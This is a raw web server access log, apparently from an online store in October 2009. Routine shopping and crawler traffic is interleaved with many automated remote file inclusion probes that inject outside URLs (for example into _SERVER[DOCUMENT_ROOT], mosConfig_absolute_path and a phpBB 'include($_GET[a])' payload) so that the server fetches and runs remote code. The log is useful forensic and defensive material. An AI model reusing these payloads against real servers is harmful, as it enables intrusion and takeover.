70.4.32.212 - - [22/Oct/2009:01:23:21 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4984A9A2004F3908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:23:21 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4984A9A2004F3908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:23:21 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4984A9A2004F3908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
220.100.96.65 - - [22/Oct/2009:01:23:32 -0400] "GET /logs/file.php?/admin/setup.php?_SERVER[DOCUMENT_ROOT]=%20%22php?bbs_id%22http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
220.100.96.65 - - [22/Oct/2009:01:23:32 -0400] "GET /file.php?/admin/setup.php?_SERVER[DOCUMENT_ROOT]=%20%22php?bbs_id%22http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 206 "-" "Mozilla/3.0 (OS/2; U)"
70.4.32.212 - - [22/Oct/2009:01:23:36 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4984A9A2004F3908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
58.230.118.81 - - [22/Oct/2009:01:23:38 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:23:38 -0400] "GET /logs/access_log.Q109082600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:23:38 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:23:41 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:23:41 -0400] "GET /logs/access_log.Q109082600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:23:41 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
70.4.32.212 - - [22/Oct/2009:01:23:42 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4980D9D2005E1908L+M37+ENG HTTP/1.1" 200 58992 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:23:43 -0400] "GET /images/items/6500009_THUMB.JPG HTTP/1.1" 200 2579 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4980D9D2005E1908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:23:44 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4980D9D2005E1908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:23:44 -0400] "GET /images/addtocart.gif HTTP/1.1" 200 591 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4980D9D2005E1908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:23:44 -0400] "GET /images/fav_a-a.gif HTTP/1.1" 200 281 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4980D9D2005E1908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:23:44 -0400] "GET /images/items/6500004_THUMB.JPG HTTP/1.1" 200 2569 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4980D9D2005E1908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:23:44 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4980D9D2005E1908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:23:44 -0400] "GET /images/fav_a-b.gif HTTP/1.1" 200 275 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4980D9D2005E1908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
209.59.12.99 - - [22/Oct/2009:01:24:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.4.32.212 - - [22/Oct/2009:01:24:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4F8EB912006D4908L+M37+ENG HTTP/1.1" 200 59650 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4980D9D2005E1908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
58.230.118.81 - - [22/Oct/2009:01:24:23 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:24:24 -0400] "GET /logs/access_log.Q109082600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:24:23 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:24:24 -0400] "GET /logs/access_log.Q109082600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:24:25 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:24:24 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
70.4.32.212 - - [22/Oct/2009:01:24:31 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AB41855942009C2908L+M37+ENG HTTP/1.1" 200 59650 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4F8EB912006D4908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
220.100.96.65 - - [22/Oct/2009:01:24:42 -0400] "GET /config.php?/admin/setup.php?_SERVER[DOCUMENT_ROOT]=%20%22php?bbs_id%22http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 208 "-" "Advanced Browser (http://www.avantbrowser.com)"
220.100.96.65 - - [22/Oct/2009:01:24:42 -0400] "GET /logs/config.php?/admin/setup.php?_SERVER[DOCUMENT_ROOT]=%20%22php?bbs_id%22http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
70.4.32.212 - - [22/Oct/2009:01:24:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4F8F099200959908L+M37+ENG HTTP/1.1" 200 42535 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB41855942009C2908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:24:57 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4B85F9F200A8C908L+M37+ENG HTTP/1.1" 200 42530 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4F8F099200959908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
220.100.96.65 - - [22/Oct/2009:01:25:01 -0400] "GET /logs/contact.php?/admin/setup.php?_SERVER[DOCUMENT_ROOT]=%20%22php?bbs_id%22http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 214 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
220.100.96.65 - - [22/Oct/2009:01:25:01 -0400] "GET /contact.php?/admin/setup.php?_SERVER[DOCUMENT_ROOT]=%20%22php?bbs_id%22http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
70.4.32.212 - - [22/Oct/2009:01:25:02 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4781094200B4A908L+M37+ENG HTTP/1.1" 200 56983 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4B85F9F200A8C908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:25:03 -0400] "GET /images/AMEX.GIF HTTP/1.1" 200 2378 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4781094200B4A908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:25:04 -0400] "GET /images/VISA.GIF HTTP/1.1" 200 2800 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4781094200B4A908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:25:04 -0400] "GET /images/bt_cal-a.gif HTTP/1.1" 200 504 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4781094200B4A908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:25:04 -0400] "GET /images/MCARD.GIF HTTP/1.1" 200 2789 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4781094200B4A908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:25:04 -0400] "GET /images/DISCOVER.GIF HTTP/1.1" 200 2579 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4781094200B4A908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:25:04 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4781094200B4A908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
61.47.7.71 - - [22/Oct/2009:01:25:30 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
61.47.7.71 - - [22/Oct/2009:01:25:30 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
61.47.7.71 - - [22/Oct/2009:01:25:30 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
61.47.7.71 - - [22/Oct/2009:01:25:35 -0400] "GET /logs/error_log.Q109060900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
220.100.96.65 - - [22/Oct/2009:01:26:59 -0400] "GET /about.php?/admin/setup.php?_SERVER[DOCUMENT_ROOT]=%20%22php?bbs_id%22http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
220.100.96.65 - - [22/Oct/2009:01:26:59 -0400] "GET /logs/about.php?/admin/setup.php?_SERVER[DOCUMENT_ROOT]=%20%22php?bbs_id%22http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 212 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
61.47.7.71 - - [22/Oct/2009:01:27:01 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
61.47.7.71 - - [22/Oct/2009:01:27:01 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
61.47.7.71 - - [22/Oct/2009:01:27:01 -0400] "GET /logs/access_log.Q109082100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
70.4.32.212 - - [22/Oct/2009:01:27:17 -0400] "GET /images/bt_cal-b.gif HTTP/1.1" 200 506 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4781094200B4A908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:27:20 -0400] "GET /images/processcard.gif HTTP/1.1" 200 420 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4781094200B4A908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:27:21 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4C8169F200B45908L+M37+ENG HTTP/1.1" 200 57523 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4781094200B4A908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
74.6.8.113 - - [22/Oct/2009:01:28:03 -0400] "GET /logs/error_log.Q109071000 HTTP/1.0" 200 2595842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.4.32.212 - - [22/Oct/2009:01:27:58 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0157AC4080E912004C8908L+M37+ENG HTTP/1.1" 200 40400 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AB4C8169F200B45908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:28:12 -0400] "GET /images/sd_left-bottom.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AC4080E912004C8908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:28:12 -0400] "GET /images/sd_inside-corner.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AC4080E912004C8908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:28:12 -0400] "GET /images/sd_bottom-right.gif HTTP/1.1" 200 101 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AC4080E912004C8908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:28:12 -0400] "GET /images/sd_bottom-space.gif HTTP/1.1" 200 50 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AC4080E912004C8908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:28:12 -0400] "GET /images/sd_left-top.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AC4080E912004C8908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
70.4.32.212 - - [22/Oct/2009:01:28:13 -0400] "GET /images/sd_left-space.gif HTTP/1.1" 200 50 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0157AC4080E912004C8908L+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
74.6.8.113 - - [22/Oct/2009:01:28:08 -0400] "GET /logs/error_log.Q109071000 HTTP/1.0" 200 2595842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
58.230.118.81 - - [22/Oct/2009:01:28:27 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:28:27 -0400] "GET /logs/access_log.Q109083100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:28:27 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:28:28 -0400] "GET /logs/access_log.Q109091100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.47.7.71 - - [22/Oct/2009:01:28:36 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
67.23.42.167 - - [22/Oct/2009:01:28:39 -0400] "GET /xmlrpc.php HTTP/1.1" 404 208 "-" "BOV"
61.47.7.71 - - [22/Oct/2009:01:29:06 -0400] "GET /logs/access_log.Q109082100%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.newminiclub.nl/readme.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
209.59.12.99 - - [22/Oct/2009:01:29:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.193.15.3 - - [22/Oct/2009:01:29:23 -0400] "GET /logs/access_log.Q109082500//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
82.193.15.3 - - [22/Oct/2009:01:29:35 -0400] "GET /logs/access_log.Q109082800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://flashdev.open.ac.uk/webcef/data/zfxid1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:36 -0400] "GET /logs/access_log.Q109083100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:36 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:36 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:38 -0400] "GET /logs/access_log.Q109091100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:47 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:47 -0400] "GET /logs/access_log.Q109083100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:47 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:51 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:51 -0400] "GET /logs/access_log.Q109083100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:51 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:53 -0400] "GET /logs/access_log.Q109091100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:54 -0400] "GET /logs/access_log.Q109083100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:54 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:55 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:56 -0400] "GET /logs/access_log.Q109083100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:56 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:56 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:29:57 -0400] "GET /logs/access_log.Q109091100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:30:06 -0400] "GET /logs/access_log.Q109091100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:01:30:08 -0400] "GET /logs/access_log.Q109091100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
128.121.21.48 - - [22/Oct/2009:01:30:11 -0400] "GET /skin/rosun2005P_shop_s3/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
128.121.21.48 - - [22/Oct/2009:01:30:14 -0400] "GET /logs/skin/rosun2005P_shop_s3/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
128.121.21.48 - - [22/Oct/2009:01:30:14 -0400] "GET /logs/access_log.Q109081900/skin/rosun2005P_shop_s3/setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
